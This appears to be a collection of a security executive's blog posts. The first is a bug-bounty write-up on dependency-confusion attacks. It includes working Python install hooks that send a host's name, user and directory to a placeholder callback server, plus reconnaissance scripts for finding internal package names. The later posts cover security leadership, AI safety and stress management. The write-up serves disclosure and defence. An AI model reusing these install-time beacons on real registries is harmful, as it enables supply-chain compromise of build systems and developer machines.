How I hacked into Google’s internal corporate assets

It’s raining command injections! 

Every now and then, I take some time to work on bug bounty projects to explore threat vectors into real-world targets like Google, Tesla and many others. Doing so helps me stay aware of the fast-changing technical landscape, which is crucial for my role as a technology CISO. Plus, it’s enjoyable and provides extra income.

On my most recent venture, I focused on open-source and supply chain attacks. Over the course of a week I discovered multiple vulnerabilities and gained control of (read: “command injection on”) numerous in-scope bug bounty assets. Command injection essentially means the ability to execute arbitrary commands on an operating system (e.g. macOS or Linux) – in my case, as root or admin. I was able to run OS commands on over a thousand assets, including servers, containers, CI/CD systems & developer machines. Six of these assets were Google’s internal corporate assets, many more belonged to a self-driving car company’s CI/CD build pipeline, and others I can’t share the details of. These findings were mostly critical, with high impact.

Interestingly, in the case of Google, I received an honourable mention but was not awarded a bounty, as the most critical asset I compromised was a developer’s machine. In contrast, I was awarded a bounty by another company for doing just that.

How?

Today, much of our software relies on “open source software libraries” to handle specific software functions. These libraries – essentially small software packages – are freely available to the public to use, support, and maintain. They play a crucial role in speeding up and simplifying software development.

Many of the applications and software we use every day as consumers (e.g. banking apps, government services, social media) heavily depend on these open source libraries, often referred to as “dependencies”. During software development, package managers for languages such as Python and Node.js (pip and npm respectively) fetch these dependencies to build the software.

Developers are familiar with commands like:

  • npm install <packagename>
  • pip install <packagename>

These dependencies can be sourced internally, from within the organization’s artifact registry, or externally, from a public registry. However, a significant issue arises when an external attacker identifies and registers a public package name that an organization is exclusively using internally.

In such cases, package managers like npm and pip can automatically retrieve a public version of the package if no local version is available – or if the public version number is higher. If the public version is malicious, this can have immediate and severe consequences for the software being targeted, for any sensitive data associated with it, and for the customers who use it. What’s more, these types of attacks are really hard to detect when they happen.
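To make the failure mode concrete, here is a toy sketch – not any real resolver’s code – of the “highest version wins” behaviour described above. The package versions and the helper names are made up for illustration:

```python
# Toy model of naive "highest version wins" dependency resolution.
# pick_source() mimics a resolver that merges an internal index with the
# public registry and installs whichever copy has the higher version.

def _key(version):
    """Turn a version string like '1.4.0' into a comparable tuple (1, 4, 0)."""
    return tuple(int(part) for part in version.split("."))

def pick_source(internal_version, public_version=None):
    """Return which index a naive resolver would install from."""
    if public_version is None:
        return "internal"  # name is not registered publicly: safe
    if _key(public_version) > _key(internal_version):
        return "public"    # attacker's higher public version wins
    return "internal"

# Internal package exists at 1.4.0; an attacker publishes 99.0.0 publicly.
print(pick_source("1.4.0"))            # -> internal
print(pick_source("1.4.0", "99.0.0"))  # -> public
```

The attacker doesn’t need to guess the internal version number – publishing an absurdly high version is enough to win the comparison.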

How I discovered vulnerable packages

Pioneers of this bug class like Alex Birsan had already mopped up Apple, Microsoft, Yelp and many other vulnerable companies. Even so, I donned my VC thinking and took a somewhat philosophical view: a number of fundamentals were at play that, combined, would likely still let me find and exploit these bugs and thereby secure some return on investment. These fundamentals were:

  1. It is likely that many large organizations are vulnerable to dependency confusion in some way. I still believe this to be true even after my exploits – in fact, more so now. Although I don’t have hard evidence, I’ve had enough anecdotal conversations to get the impression that not many tech companies are taking an organized, risk-based approach to uplifting the security of their CI/CD pipelines. This is not something that security attestations like SOC 2 or ISO 27001 cover, but it is a critical area of risk for software development.
  2. The typical perceived approaches to solving this problem can needlessly impose cost on developer time or on the security budget, and this deters an engineering org from quickly effecting remedial change. In other words, the fix can be perceived as “hard” or “slow”, which is not entirely true: it can be as simple as registering legitimate public packages under the same names – packages that contain no code but secure the namespace so it can’t be taken by others. As an aside, I recently went to a security conference where a vendor was selling a tool to solve this exact problem. You don’t need to buy a tool for this, and the encounter reinforced to me that the issue is not well understood by security teams – the second reason I figured this particular endeavor worthy of some time and effort.
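As an illustration of that defensive fix, claiming the namespace can be as small as publishing an empty package under the internal name. A minimal sketch of such a placeholder’s setup.py, with an invented package name (this is packaging metadata only, not code that does anything):

```python
# setup.py for a defensive placeholder package. Publishing this to the
# public registry under your internal dependency's name stops an attacker
# from claiming it. It deliberately contains no importable code.
from setuptools import setup

setup(
    name="companyname-regex",  # invented example: your internal package's name
    version="0.0.1",
    description="Reserved internal namespace. Do not install.",
    packages=[],               # nothing to import
)
```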

Some things I observed while doing discovery:

When orgs build their own internal dependencies, these are typically named after an internal service or function that is consumed by multiple services or applications. For example, a company might have an internal dependency called “companyname-regex”. This is significant because the names of these internal dependencies can align with publicly discoverable names: names contained in functions in externally accessible code, or even the names of externally accessible APIs or services. Extending this hypothesis, developers might use names associated with core products or features. Because of this, a degree of discovering these names in public JavaScript – and/or brute-forcing them – is possible.

For me this is the scariest part, because of how much potential there is to target organizations and scale this attack up. I saw research from companies like Checkmarx that identified actors (unconfirmed whether malicious or not) scaling up attacks – creating hundreds of these dependencies – targeting specific companies through what seemed to be similar brute-forcing activity (guessing the names of internal services, utilities, etc.).

So I set out to find some vulnerable dependencies. I did this via a number of methods:

  • Scanned hundreds of public GitHub repositories to identify dependencies that looked like internal dependencies.
  • Spidered and scanned JavaScript on websites.
  • Scanned public web server directories to reveal endpoints like /package.json.
  • Downloaded old/archived website JavaScript and scanned it to find references to old dependencies and JavaScript functions that were removed in the last 5 years but could still be used elsewhere.
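As a rough sketch of the first method, a few lines of Python can pull dependency names out of a scraped package.json and flag those that look organization-internal. The file contents and the “acme-” prefix below are fabricated:

```python
import json

# A scraped package.json (contents fabricated for illustration).
PACKAGE_JSON = """{
  "name": "acme-webapp",
  "dependencies": {
    "lodash": "^4.17.21",
    "acme-regex": "^1.4.0",
    "acme-auth-client": "^2.0.3"
  }
}"""

def internal_candidates(package_json_text, company_prefix):
    """Return dependency names that look like internal packages."""
    deps = json.loads(package_json_text).get("dependencies", {})
    return sorted(name for name in deps if name.startswith(company_prefix))

print(internal_candidates(PACKAGE_JSON, "acme-"))
# -> ['acme-auth-client', 'acme-regex']
```

Each candidate can then be checked against the public registry to see whether the name is unclaimed.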

Scanning tools that I used included:

  • Confused – this was used to check whether the dependency was in a public registry or not.
  • Other than this, I wrote all of my other tools and used generative AI to speed up the script-writing process. The code it produced was impressive and allowed me to conduct a substantial amount of research at a far greater pace than I ordinarily would have been able to.

Scanning techniques included:

  • Searching for dependency files in places like GitHub (e.g. package.json, dependencies.txt)
  • Searching for functions within public code on websites that refer to possible dependency names. This included:
    • import('dependency_path')
    • require('dependency_path')
    • define('module')
    • "exports=JSON.parse"
    • References to 'node_modules', the directory where dependency files are usually saved
  • Using regex to search through javascript looking for potential dependency names
    • (example: grep -Por '".*":"\^[0-9]+\.[0-9]+\.[0-9]+"' | tr ',' '\n' | awk '/".*":"\^[0-9]+\.[0-9]+\.[0-9]+"/ {print}' | sort -u)
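The same extraction can be sketched in Python, which is easier to tune than the shell pipeline above. The JavaScript fragment is fabricated:

```python
import re

# A fragment of bundled JavaScript with an embedded dependency map
# (fabricated for illustration).
JS = 'e.exports=JSON.parse(\'{"left-pad":"^1.3.0","acme-regex":"^1.4.0"}\')'

# Match "name":"^MAJOR.MINOR.PATCH" pairs, as found in package.json
# dependency maps that get inlined into JavaScript bundles.
PATTERN = re.compile(r'"([^"]+)":"\^(\d+\.\d+\.\d+)"')

deps = sorted(set(PATTERN.findall(JS)))
print(deps)
# -> [('acme-regex', '1.4.0'), ('left-pad', '1.3.0')]
```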

How I exploited dependency confusion

Once I had identified a number of externally accessible (potential or confirmed) dependency names, getting a command injection on a server to prove the concept was conceptually straightforward but practically difficult. I won’t explain this much here – other resources exist that explain the process in more detail.

However, in essence, a curl command placed in a dependency install script like the one below – once the package is installed on a target host – grabs some basic information about the host and sends it to a server.

Bear in mind that for some programs this is actually out of scope (e.g. Yelp), but the vast majority of programs where I’ve seen this expect some form of command injection as proof – ‘or it never happened’. Always check the program scope before proceeding.

Example pip dependency preinstall script:

import subprocess

def pre_install():
    # Collect basic host details and send them to the callback server.
    curl_command = 'curl -H "Hostname: $(hostname)" -H "Username: $(whoami)" -H "Directory name: $(pwd)" https://my-call-back-server'
    subprocess.run(curl_command, shell=True)

if __name__ == "__main__":
    pre_install()
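For a script like the one above to actually fire during pip install, it has to be wired into the package’s build metadata. One common approach – sketched here with placeholder name, version and callback URL – is overriding the install command in setup.py:

```python
# setup.py that beacons during "pip install <package>" by overriding the
# standard install command. Name, version and URL are placeholders.
import subprocess
from setuptools import setup
from setuptools.command.install import install

class CallbackInstall(install):
    def run(self):
        # Send basic host details to the callback server; ignore failures.
        cmd = ('curl -s -H "Hostname: $(hostname)" -H "Username: $(whoami)" '
               'https://my-call-back-server')
        subprocess.run(cmd, shell=True, check=False)
        super().run()  # continue with the normal install

setup(
    name="companyname-regex",
    version="99.0.0",  # high version so it wins dependency resolution
    cmdclass={"install": CallbackInstall},
)
```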

Some things I observed while doing exploitation:

  • Organizations impacted the most were those running continuous delivery and deployment. Software with a slower development cycle wasn’t impacted in the same way, because with continuous delivery and deployment, artifacts are fetched regularly and automatically, so compromise within a given timeframe is much more likely. Organizations impacted by this bug are typically going to be medium to large software companies with scalable software architectures like Kubernetes.
  • This also impacts developers. I’d often have developers installing my packages on their local development machines due to a general lack of awareness or vigilance around open source risks.
  • These packages are not just running software around the world; they are the hidden bedrock of our digital economy – the basis upon which commerce happens around the globe, and upon which modern critical services such as healthcare are provided. All it takes for a financially motivated criminal – or some form of espionage – is to drop a well-targeted package into a public registry and BOOM: a malicious actor could gain control of any number of servers across any number of large organizations. Because of this, I’d love to see these registries work more closely with the bug bounty community to test evasion & detection techniques for malicious packages.

The qualities of high performing security staff

The speed and reliability at which a CISO can deliver a security strategy depends heavily on the culture and characteristics of the teams and individuals that make up the security organization. It is for this reason that attracting and retaining highly effective security folk is paramount in order to build and run a security organization that is able to deliver what the business wants, in a world where businesses are increasingly wanting more from their security teams.

So what makes for high performing security folk? I was talking to another CISO the other day who said to me, “some of my best security hires have been people from non-security backgrounds”. I’ve observed the same thing. Why is that? Well, these people often come into the field with a set of soft capabilities that are equally as important as typical technical security skills. These soft skills are what allow them to really make an impact in the security space. So what are these ‘soft skills’?

After hiring & managing performance in this space for a while, my observation is that some of the key soft factors for success are the following traits, in no particular order:

Care & ownership

The first trait is to have a high degree of personal accountability & care. This deserves a blog post on its own, but a few examples that come to mind are:

Taking care to perform work to a high standard. This is not just about ensuring that processes are followed correctly, documentation is well written and that communication is effective, it’s also about going demonstrably above and beyond to serve & support other stakeholders.

When mistakes are made – if a failure occurs, take ownership immediately. Shifting blame or excuse-making is going to end badly for everyone involved. Taking ownership of our own failures shows that our primary interest is in learning from mistakes – rather than hiding problems. The organization and the team can only win if we collectively own our mistakes, both as individuals and as a team.

Pragmatism

Deciding what not to do is as important as deciding what to do.

This is about taking the path of least complexity and being realistic about what is possible and how it can get done. Sometimes things can be done quicker and more efficiently if we give it more thought. Sometimes, we have to make hard decisions to say “no” to something in order to succeed. 

In practice, this could be about accepting that businesses are rarely in a “blue sky” situation and, rather than investing energy in making the impossible possible, focusing on changing the things that we have control over. Over the course of my career, I’ve seen engineers invest too much emotion in wishful thinking and too little in accepting reality and getting on with solving the problems we can control. Being heavily grounded in reality is important. That’s not to say that we shouldn’t be visionary – to the contrary – vision is essential if we want to succeed; however, vision and reality need to work together, not against each other.

Optimism

Is the glass half-empty or half-full?

Putting aside the security context for a moment, psychology research has repeatedly found that people who face challenges with optimism are more likely to succeed in overcoming those challenges, while those who face challenges with default pessimism are more likely to fail.

An optimist will always seek to make something good, even in a bad situation – and security can be overwhelmingly negative if we allow it to be. It’s not good when you see a security culture underpinned by a persistent sense of pessimism – this is demoralizing and unsustainable.

Those who succeed in the security space, in my experience, are those who come into work with a sense of implicit optimism and their optimism is applied to their work; spread across various projects, team interactions and whatever challenges that they may face throughout their employment.

Courage & Fearlessness

What are you looking at – a mountain or a molehill?

Sometimes people get hung up on “big problems” when in fact solving the problem is not quite as insurmountable as it may seem. Sometimes anxiety can get in the way and create a bigger-than-necessary psychological barrier.

Security is full of all kinds of challenges and pitfalls and so this is not to say that we should be willingly naive about the impact of threats and risks, but rather that we should be prepared to face them fearlessly, without intimidation. Being educated about the risks is important and fearlessly seeking to solve problems & mitigate risks is equally as important. 

Organization

Delivering any project, large or small, requires some level of personal organization and those who are exceptional at organization tend to be exceptional at delivering larger pieces of work or strategies. 

This is especially important in security for two reasons; firstly security teams need to move quickly and this is more likely to happen when they are well organized. Secondly, security risks are complex, touching on so many facets of an organization and that kind of breadth can’t possibly be managed effectively without some level of organization. 

So having the ability to reach out, grab complexity and chaos and seek to simplify it by structuring it quickly is a really important attribute; I’ve seen some people do it faster than others and subsequently bring more effective and lasting change to an organization, faster. 

Communication

Communication is like a magic wand and some people wave the wand to great effect. How we communicate directly impacts the ability of an individual, a team and the whole organization to succeed. Some examples of excellent communication include:

  • The ability to listen.
  • The ability to communicate technical concepts in a simple way – this is especially important when communicating to non-technical stakeholders.
  • The ability to communicate risk in a way that the audience understands and appreciates
  • The ability to actively manage perceptions of stakeholders and staff.

Humility

Treat the janitor with as much respect as the CEO.

Those teams that move quickly and get more done are teams that embrace and support diversity and psychological safety. A key ingredient for psychological safety is to have people who are not invested heavily in defending their own self-importance but rather are genuinely interested in the success and growth of others and are willing to learn from others. For this to happen, humility needs to exist.

In practice, people who exhibit humility are more willing to listen, take advice from the team and seek to empower the team as a whole. They are more likely to be a supportive and helpful presence when something goes wrong, and they are far more likely to build trust with others, because less effort is invested in protecting self-importance – which can be an inhibitor for building trust & collaboration.

Transparency

For a team to be able to make informed and effective decisions quickly, a high degree of transparency needs to exist to allow information to flow freely. If an individual deliberately obfuscates to protect turf, perceived dignity or perceived reputation, this will slow or inhibit the flow of information, which will degrade the ability to make effective decisions – or even result in the wrong decisions being made and a wild goose chase unfolding. This is a nightmare scenario when resources are limited and pressure is high to move quickly.

What happens when unsafe AI is profitable

For more than 15 years, tech leaders from around the globe have been lobbying governments not to regulate the technology industry. Over the last 12 months, this sentiment has virtually reversed, with tech leaders pleading with governments to regulate Artificial Intelligence (AI). It’s one indication that if we’re going to do AI as a human race, we need to get it right – and if we don’t, the consequences will be disastrous.

History serves as a guide for the future

For those who struggle to see the red flags, history serves as a guide; while social media companies were vigorously lobbying against regulation, their algorithms had a vastly damaging effect on the wellbeing of millions of individuals around the world. Countless reports have shown children paying the price because algorithms were serving up content that drove them to eating disorders and even suicide – amongst other things. Yet despite multiple reports of these ill effects around the globe – and even a coroner’s report in London which found that Instagram’s algorithm contributed significantly to the cause of a death – social media companies insisted that regulation was unnecessary.

Enter ChatGPT, and a tidal wave of sentiment change swept across the tech industry overnight, with tech leaders deciding that regulation of AI was essential. There was a collective realization that this technology was about to become pervasive in our lives far beyond what the common person can possibly understand, and that without safety measures its impact might even outpace the trail of disasters left by unsafe social algorithms.

Over the last 5-10 years, we’ve seen social media companies compete in an arms race to build the most powerful social algorithms yet; these algorithms drive up engagement, which in turn drives up revenue. As these tech companies compete for the attention of users around the world, the companies who succeed in growing their revenue and business value are the ones who build the most effective algorithms. This has become a problem for some social media companies – after all, if kids are moving onto other platforms where algorithms are more effective at grabbing their time & attention, this hits revenue and starts to become an existential risk.

How organizations act when unsafe AI is more profitable

Creating AI that is safe-by-design doesn’t just happen – it takes time and investment. When revenue loss or business viability is a looming threat, the appetite to invest in safety-by-design decreases, resulting in technology that has a higher risk of being unsafe and/or toxic. Frances Haugen – a former Product Manager at Meta and whistleblower – used the term “profit over safety” to describe this phenomenon inside Facebook. We saw an example of this when TikTok’s meteoric rise in monthly active users drove users away from Facebook – Zuckerberg called this out as a threat in an investor call and acted quickly to stay competitive by introducing an updated video algorithm that had a habit of elevating harmful content. Similarly, after facing a loss-making existential crisis, Musk decided to reduce Twitter’s safety team (the team responsible for ensuring content is safe), and following this, researchers identified a rise in unsafe content.

As these social media companies drive up their profit & revenue and compete with aggressive algorithms, they are playing with the lives of children. It doesn’t take a coroner’s report or leaked research from inside Meta, to see that. Apart from the fact that this is stealing a generation of livelihoods and having an ever-growing harmful effect on society, it is a harbinger of something more dangerous; it’s a taste of things to come if AI risks aren’t properly understood and managed. 

You don’t need to listen to the hype about Musk’s comment on the likelihood of AI annihilating humanity to know that we have a problem on our hands. Whether you believe Musk or not is arguably immaterial – other problems are fast emerging which have the potential to create anything from vast systemic economic or social imbalances in our society, through to physical safety or privacy issues in the daily lives of people if AI design isn’t done properly from the outset. 

Will a saturated AI market give rise to toxic business models?

Perhaps the most significant lesson to be learned from the history of social algorithms is that the pain wrought by these algorithms is not at the hand of one or two companies – the toxicity extends across an entire industry. These businesses live and die by how effective their algorithms are, and it is this investor-charged competition that has created an ‘algorithmic arms race’ at the expense of children. Similarly, a time will come when the market is saturated with businesses who wield AI to great effect, and the question will no longer be “do you have AI” but rather “how effective is your AI”. When this happens, businesses and entire industries whose competitive advantage depends on how effective their AI is will be more likely to act in unethical or unsafe ways (i.e. developing unsafe AI) to maintain a competitive advantage. At that point – as we saw with social algorithms – we could see large-scale development and use of AI that causes harm in ways people don’t expect.

How security leaders can make a positive impact right now:

#1 – Educate yourself on emerging frameworks & regulations.

It’s positive to see regulators and organizations moving quickly to introduce guidelines for the safe development of AI. Google, for example, has released a set of recommended practices for responsible AI, and these are excellent resources for CEOs, CTOs and CISOs to consume. If, as a security leader, you are not already reviewing these emerging regulations and frameworks and using them as a basis for discussion with stakeholders in your business and the broader industry, then now is a great opportunity to start.

#2 – Start to think about how your vendors need to be more transparent on this.

When sourcing AI-based products, CISOs need to understand where and how AI is being used in their organizations; are vendors and providers being transparent about their use of AI in their products? What are vendors doing to ensure that equitability, interpretability, safety and privacy are baked into their AI by design? CISOs need to seek more transparency from vendors on this – and by demanding it, they will send a signal to vendors that anything less is not commercially viable.

#3 – If your org builds AI, you need to have a meaningful ethics framework in place

At this point, the burden of responsibility sits with the software & tech companies who are actually building AI. Never before have safe-by-design principles been so sorely needed; as AI models are built, the core principles of equity, safety and privacy need to be seriously considered as part of their design, and AI & ML teams need to be trained on – and take ownership of – responsible AI principles & practice. Board members need to be asking their CEOs whether they have meaningful ethics frameworks that govern how AI operates within their technologies. Without a framework and a vision to guide the responsible development of AI, history will only repeat itself; lucrative – but toxic – business models will spawn, spurred on by investors, while in the background the lives and wellbeing of individuals are left by the wayside – just another job for the coroner to investigate.

The Security Organization

Over the coming months I’ll be writing a series addressing key challenges that CISOs face – challenges that security folk typically don’t get trained on – and how I personally solve these as a CISO. I hope this will be a source of inspiration for other CISOs and, at the very least, a useful resource for others who are starting to move into this space.

I’ll be covering topics such as designing an organizational structure, optimizing the organization, effective strategy & planning, winning over the business, staff attraction & retention, the mindset of a CISO & much more. 

Organizing the security organization 

The first topic I want to consider is organizing the organization. For the purposes of this post, when I talk about “the organization” I’m referring to the teams that the CISO has line management of – not the rest of the business. As CISOs we will typically end up running an organization made up of a number of internal experts & outsourced partners. I run an organization made up of experts in application security, penetration testing, cloud security, data privacy & protection, security operations, infrastructure security, compliance & assurance and more. Managing an organization is not – in and of itself – a unique task; however, deploying an organization to reduce complex risk as efficiently as possible is nothing less than a work of art.

The challenge many CISOs have is to ensure that the organization is appropriately structured, in terms of size and capability, to deliver the security & privacy strategy for the organization and its customers. The strategy will almost always include risk reduction, which can manifest in a diversity of programs and initiatives across the business, impacting the enterprise and any products or services sold by the business. In addition, a strategy may also involve ensuring that customers have true agency over their data (privacy), that customers have assurance in the services or products provided by the business, and that investors know they are buying an asset they can have confidence in. In practice, deploying an organization to facilitate these things can be a very complex task, so it is absolutely essential that the CISO is able to regularly assess the performance of their own organization to ensure it is optimally delivering value to the business.

So if keeping the security & privacy organization performing at peak is so important, how do we do it? In order to remain optimal, here are a few essential characteristics that the organization needs to be – or have:

Extrospection

The first characteristic is extrospection. The organization must be structured to systemically have a high level of awareness of the external environment. This can include awareness of external risks & threats, threat actors, industry trends, market competition, the broader organization, emerging technologies, modern architectures and so much more. This should be both an individual & cultural imperative and also something that is systematized across the organization. Without this information, the organization will fail to understand what threats are meaningful, what competitors pose a risk, what emerging regulations will impact the business, what industry trends can be exploited and how to effectively influence the broader organization – amongst other things. Without awareness of the external environment, the organization will lose its identity, purpose and grasp on reality and this will result in a failure to deliver the strategy and add meaningful value to the business. Unless such awareness is carefully systematized and infused in culture across the security & privacy organization, the outcome could become existential – for the business and/or the CISO!

Empowered

The organization needs to have the power it needs to carry out the strategy. In practice, this means the organization needs to be resourced appropriately, partnered well, that the right levels of governance, leadership and sponsorship are in place – and that the entire security organization has trust of the business. The CISO needs to ensure that no parts of the org are spinning wheels and that when spinning wheels are encountered the problem is quickly addressed so that the rubber can once again hit the road.

Trusted

Trust is not just something the CISO needs to build personally, it’s something that needs to exude from the organization. When partners, external stakeholders, customers or prospective employees look into a security organization, they need to feel they can trust it. 

Engineering trust happens from the ground up – it doesn’t happen using the :wave hand: emoji. Trust is built every time you introduce or adjust a process; it’s built every time you implement or change a system; it’s built or lost every time you make a change to the organizational structure. 

As a CISO, trust is scrutinized and subsequently won or lost with every single word you use and every single action you take. Likewise, this applies to the security organization overall. To use an analogy, the security organization has a ‘trust bucket’. The org performs thousands of interactions with stakeholders every day (process & system interactions, staff communication, etc). Every interaction has an effect on your organization’s trust bucket: either someone (i.e. an individual or team) or something (i.e. a process) is spending that trust – or they are earning it. As the trust bucket depletes, the level of noise increases, degrading the ability of the organization to meet its operational and strategic objectives. As the trust bucket fills, the reverse happens and the organization is celebrated.

A key ingredient I use for building a highly trusted organization includes attracting, retaining and building field experts/leaders who are effective communicators, humble (low-ego) and who embrace a culture of psychological safety. 

Agile

The external environment is constantly changing; new threats, new vulnerabilities, new geopolitical challenges, new regulations, new frameworks. Not only this, the broader business will also experience changes in pursuit of its mission. As these changes happen, the security organization needs to be able to pivot and adapt quickly in order to exploit both tactical and strategic opportunities. This is a working philosophy that individuals need to be personally invested in, as well as something that needs to permeate the org structure & culture.

Agility & change are usually accepted more readily when the ROI is clear. Articulating the ROI is something that organizational leaders need to be in the habit of doing in order to drive the change that is needed.

Capable

The organization needs to have the right set of capabilities in place to support the delivery of the strategy. This is not just referring to technical or SME capabilities (which are important) but also soft capabilities such as the ability to communicate powerfully, the ability to influence, personal resilience and more. 

Understanding who should do what, which capabilities are deficient and how to rectify this is something the CISO needs to have the final say on. 

Tuned

Finally, the CISO needs to treat the organization like a living, breathing organism – it needs constant care & constant tuning. The CISO needs to understand current and emerging threats to the organization itself, as well as emerging constraints on any of the above, to ensure they are managed before it is too late.

As part of this, CISOs need to consider:

  • The management of the supply and demand of resources. GCP’s CISO Phil Venables has written a great article which goes into more detail on this in the context of security budgets. 
  • Regulate the speed of systematization – sometimes teams & services need more systematization, sometimes they need less. The CISO needs to ensure that the organization is maturing and growing at a practical and sustainable rate. Striking a balance of investment here is important. Doing things for the sake of doing them is wasted investment.
  • Ensure that the organization structure is actually delivering the outcomes needed by the business. Tracking this with metrics is a great way to monitor this. I’ll write a separate post later on what metrics can be useful in this context.

Dealing with stress as a security leader

Over the last few months I’ve been asked by multiple people how I deal with stress. This is no surprise – it is well documented that Chief Information Security Officers and many other security professionals have a uniquely stressful line of work.

Security leaders have all kinds of challenges to deal with in the course of protecting their business and its customers. The stakes are even higher when protecting not just information, but people’s lives and/or quality of life.

In order to be effective, security leaders need to manage risk in extremely complex environments. This responsibility can extend to managing teams, creating vision, inspiring change, negotiating with stakeholders, organising systems, people & work, planning how to execute on the vision and lots more. In so far as management goes, this is nothing particularly new.

However, security leaders have a pivotal role in protecting the organisation and its customers from crisis; cyber attacks have a way of choosing the least opportune moment to strike and when they do, security leaders are on the hook. Security leaders are scrutinised by their ability to protect and lead the organisation both from crisis and at a time of crisis.

To compound this, global security is declining. International cyber-crime groups are flourishing with impunity in places like Russia. Geopolitical alliances are sharply polarising with the risk of collateral damage of cyber-warfare spilling over and impacting western businesses. Both threats present a very real risk to western businesses, and the lives and livelihoods of people in the west.

So I reflected on the question that was posed to me – “how do you do it?”

For me personally, the last few months have been especially crazy. My wife has been in hospital several times. We’ve had a fourth child and we’ve had limited sleep. Believe it or not, that’s not the challenging part.

The really challenging part for us has been supporting our kids – we now have 4 children, two of whom are high-functioning ASD. Anyone who has experience with ASD will be familiar with the hour-by-hour challenge of dealing with emotional dysregulation and the typical difficulties associated with impaired executive function. This can be relentless and thoroughly exhausting for the child/ren and the parents.

In reflection, then: no shortage of stressors in my personal and professional life. So, to answer the question, how do I manage it?

Perspective & purpose

What’s important in life?

For me it’s my family and my future. As much as I love my work and the team at work, I have a very clear purpose and future for my life that doesn’t include work. That’s not to say that I slack off at work – quite the opposite, I’m known for being motivated, focussed and hard working. But work isn’t the end-goal for me. I’m invested in doing a great job, but far more invested in my future & purpose. Unfortunately too many people conflate these things.

Meditation

I meditate every day – it clears my mind and brings me a profound sense of peace, even after a harrowing day. Meditation takes many different forms – my meditation consists of reading through the Bible, understanding it and deriving meaning and purpose.

Allocating time to meditate is essential in order to have a mind that is clear and effective. Research has shown that meditation is especially helpful for anyone struggling with anxiety or other mental health issues which typically amplify stress.

Compartmentalisation

When I switch off work, I try to switch off properly. Research has shown that this is an extremely effective way of dealing with stress. I do this in a few ways.

  • I use the focus feature on my mobile phone to control who/what can contact or send me a notification and when. This does things like block calls during dinner time so that we can share an uninterrupted family dinner.
  • When I finish work, I leave my phone in my room and only use my Apple Watch for minimal interaction with notifications.
  • If I work after-hours, it’s usually only on the condition that it will not result in unmanageable stress or conflict with other personal matters which would otherwise increase stress.

Delegation

I push work to trusted individuals. As a security leader, if you haven’t yet built a team that you trust, you need to build a trusted and competent team so that you can delegate. Building trust in your team can only happen if you have the right culture.

Prioritisation

Across the industry, security people often have far more hours’ worth of tasks than can possibly be done in a day.

Constantly stepping back, and reassessing and splitting my work into 80/20 is important. I can’t do everything, so I pick what I colloquially call “the burning priorities”. Those that don’t make the cut get delegated to other trusted individuals and others I’ll defer or push back on.

Improving – or implementing – the systems and/or processes that are needed to manage the flow of work in the organisation is also an effective way to ensure that prioritisation and focus are correctly systematised.

How to optimise your hacking by understanding your mind

Over the course of my career, the limitations and capabilities of the human brain, and how these impact the tasks we perform, the choices we make and our long-term career trajectory, have been a source of great fascination for me.

When solving problems at work we rarely take a step back and consider to what extent our mind is equipped to handle a particular task. Usually we just focus on fixing the problem, not optimising the thing that is fixing the problem.

But the reality is that inside our heads, we are each equipped with a kit that contains its own incredibly unique set of limitations and strengths.

To illustrate the point, we might briefly compare the brain with a car: you don’t drive a racing car up a sand dune, or race a four-wheel drive against F1 cars.

The reality is that each of us has a brain equipped with a varying set of cognitive abilities. Understanding your cognitive strengths and weaknesses can help improve your ability to perform your work: you can capitalise on your cognitive strengths, and you can find ways to mitigate the effect of your cognitive struggles.

So what are some practical examples of this? While I’m going to provide examples which can be applied to all types of work, I’ll use hacking as the practical example.

Let’s start with executive function.

Executive function

Executive function is the cognitive process that helps us to regulate, control and manage our thoughts and actions. It includes a number of cognitive processes, but for the purpose of this post, I want to focus on only three of them.

Each of us have certain strengths and certain struggles with our executive function. These struggles can be amplified significantly for people with ASD or ADHD.

Task Initiation

Task initiation refers to the capacity to begin a task or activity, as well as to independently generate ideas, responses or problem-solving strategies. People who struggle with initiation typically want to succeed at a task but can’t get started.

A great example of this is bug hunting. Hunting for bugs or exploits that allow a hacker to exploit a system is usually something people do in their spare time, so self-discipline is needed to sit down and, well… start.

I see people all the time who want to get started in bug hunting and, despite all the advice out there to just “get started”, really struggle to do so. For some people – those who struggle with task initiation – this is a very real issue. Usually these people are just as smart as anyone else, but the one thing holding them back is the cognitive struggle encountered when initiating tasks.

I’ve seen some great initiatives within infosec at a very local level which inadvertently help people who struggle with this. Local study groups who proactively encourage beginners to join in are a great way to bridge this gap.

If, on the other hand, you have no trouble initiating a task, then use it to your advantage! Start a local meetup. Join an organising committee. Invite a friend who struggles with task initiation to collab with you. Initiate your work and career away.

Planning and organisation

Planning and organisation refers to a person’s ability to manage current and future-oriented task demands. Planning relates to the ability to anticipate future events, set goals and develop appropriate steps ahead of time to carry out a task or activity. Organisation relates to the ability to bring order to information and to appreciate the main ideas or key concepts when learning and communicating information.

In information security there is an array of roles that require varying levels of organisational and planning ability. It’s worth analysing your capacity to plan and organise, and then aiming for a role which aligns with your capability in this area.

In the past, I’ve made the mistake of hiring someone who, while technically excellent, struggled to manage small projects. They really struggled with their ability to plan and organise. That person was able to thrive much more in an engineering context where they could execute against a set of sequential instructions.

As a bug hunter, organising is helpful for reconnaissance and planning is helpful for exploitation. I’ve seen bug hunters do these things at varying levels of complexity. If planning and organisation is a strength of yours, then use it to map out a plan on how to get to your ideal role, or attack your ideal target.

On the flip side, if you struggle in this area and you want to bug-hunt, I think you are in luck – not much planning or organisation is actually needed to discover and exploit bugs.

Working memory

Working memory (not to be confused with short-term memory) is your mental sticky note or sketchpad. It’s a skill that allows us to work with information without losing track of what we’re doing. 

It describes how much working information you can store in your mind at a given time. For example, you might be storing lines of code, exploit strings, heck – even UUIDs or hashes.

How much information you hold in your working memory determines how much of the overall informational picture you can see/process at once.

Difficulty with working memory might mean someone struggles to remember their code logic while scripting, or needs to reference documented instructions more regularly to compensate for not being able to hold them in working memory.

If you have a bigger working memory, then this is going to be particularly beneficial if you are reverse engineering, doing OSINT or building an exploit.

If you struggle with working memory you might need to consider ways to mitigate the impact of this. For example, you could work on visualisation skills. Visualising the problem requires your brain to store the information differently. Breaking big chunks of information into bite sized pieces also helps to digest information more easily.


While executive function is made up of many cognitive processes, it is itself just one aspect of how our minds are equipped to handle the problems we solve each day. There are many other aspects of our minds that we use to solve problems, make decisions and process information.

And the more we learn about our minds, the better equipped we are to solve tasks more efficiently and do our work more effectively.

Do yourself a favour and become more effective at work – hacking or whatever you’re doing – by identifying your cognitive strengths and weaknesses and learning how to use them to your advantage.

Related resources

What are cognitive abilities and skills, and can we boost them?

Walking the path least trodden – hacking iOS apps at scale

This is a story of how I set out to find some bounties and how I found gold, hacking iOS apps, at scale.

